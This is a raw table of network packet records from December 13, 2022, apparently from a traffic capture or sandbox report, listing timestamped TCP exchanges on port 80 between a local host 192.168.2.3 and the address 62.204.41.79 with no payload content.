                                              Dec 13, 2022 20:09:14.979180098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.979326963 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.979471922 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.979592085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.979733944 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.979868889 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.980015993 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.980148077 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.980287075 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.980408907 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.980541945 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.980688095 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.980827093 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.980967045 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.981107950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.981230974 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.981436014 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.981625080 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.984245062 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.984425068 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.984610081 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.984817028 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.985059977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.985239983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989321947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989321947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989321947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989321947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989321947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989321947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989321947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989321947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989391088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989391088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989391088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989391088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989391088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989391088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989391088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989391088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989422083 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989422083 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989423037 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989423037 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989423037 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989423037 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989423037 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989423037 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989449024 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989449024 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989449024 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989483118 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989483118 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989633083 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989772081 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.989924908 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.990068913 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.990216017 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.990381956 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.990590096 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.990726948 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.990915060 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.991069078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.991400003 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.991552114 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.991703033 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.991841078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.991991043 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.992130041 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.992285967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.992419958 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.997891903 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.998033047 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.998164892 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.998311043 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.998452902 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.998711109 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.998842001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.998960018 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.999078989 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.999212027 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.999349117 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.999500036 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.003463984 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.003514051 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.003583908 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.003748894 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.003912926 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.004337072 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.004388094 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.004554987 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.004669905 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.004698038 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.004785061 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.005166054 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.005705118 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.005731106 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.005836964 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.005851984 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.005994081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.015821934 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.015959024 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.016083956 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.016215086 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.016344070 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.016484022 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.016601086 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.016724110 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.016851902 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.016973019 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.017088890 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.017229080 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.017345905 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.017472982 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.017597914 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.017728090 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.017863035 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.017998934 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.018140078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.018260002 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.018395901 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.018528938 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.018651962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.018779039 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.018909931 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.019016981 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.019140005 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.019269943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.019428968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.019567013 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.019685030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.019817114 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.019946098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.020083904 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.020210981 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.020344973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.020481110 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.020598888 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.020711899 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.020838976 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.020967960 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.034702063 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.034728050 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.034872055 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.035079002 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.035191059 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.035365105 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.035511971 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.035635948 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.035752058 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.035917044 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.036119938 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.036372900 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.036475897 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.036596060 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.036716938 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.036922932 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.037034988 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.037190914 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.037527084 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.037543058 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.037633896 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.037880898 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.038006067 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.040967941 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.040987968 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.041004896 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.041018009 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.041032076 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.041048050 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.041076899 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.041533947 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.041548967 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.041560888 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.041610003 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.041673899 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.041687012 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.041702032 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.041871071 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.042115927 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.044872999 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.044891119 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.045156002 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.045378923 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.045722961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.045737982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.050035000 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.050055981 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.050071001 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.050159931 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.050175905 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.050255060 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.050314903 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.050446987 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.050462008 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.050477028 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.050491095 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.050570965 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.050586939 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.050620079 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.050673962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.050761938 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.050873041 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.050924063 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.051013947 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.051115036 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.051342010 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.051536083 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.051934004 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.052007914 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.052131891 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.052315950 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.052397013 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.052560091 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.052737951 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.052922010 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.058634043 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.058653116 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.058666945 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.058762074 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.058922052 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.059165955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.059238911 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.059348106 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.059536934 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.059689999 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.059803963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.059919119 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.075279951 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.075515032 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.075560093 CET4973880192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.075690985 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.075906038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.076132059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.076383114 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.076502085 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.076520920 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.076525927 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.076603889 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.076711893 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.076771021 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.076787949 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.076874018 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.076919079 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.077003002 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.077075958 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.077116966 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.077244997 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.077266932 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.077400923 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.077574015 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.077589989 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.077593088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.077707052 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.077729940 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.077889919 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.077929974 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.078037024 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.078046083 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.078121901 CET4973980192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.078161955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.078186035 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.078334093 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.078372955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.078445911 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.078540087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.078563929 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.078707933 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.078727007 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.078804970 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.078938961 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.078978062 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.079065084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.079087973 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.079193115 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.079308033 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.079437971 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.079452038 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.079488993 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.079564095 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.079722881 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.079731941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.079847097 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.080005884 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.080030918 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.080168962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.080249071 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.080359936 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.080363035 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.080507040 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.080532074 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.080646038 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.080769062 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.080800056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.080893993 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.080946922 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.081012964 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.081096888 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.081156969 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.081239939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.081243038 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.081367970 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.081408978 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:15.081490993 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.081619978 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.081744909 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.081870079 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.082012892 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.092688084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.093064070 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.093220949 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.093446016 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.093506098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.093657017 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.093790054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.093915939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.094048977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.094536066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.094691992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.094825983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.094974041 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.095093966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.095200062 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.095292091 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.095398903 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.095530987 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.095673084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.096025944 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.096148968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.096245050 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.096380949 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.096518993 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.096636057 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.096726894 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.096863985 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.097168922 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.097284079 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.097399950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.097543001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.097660065 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.097757101 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.097861052 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.097995043 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.098325968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.098468065 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.098602057 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.098750114 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.098908901 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.099026918 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.099132061 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.104156017 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.104326963 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.104568005 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.104720116 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.104917049 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.105083942 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:15.105231047 CET4973680192.168.2.362.204.41.79
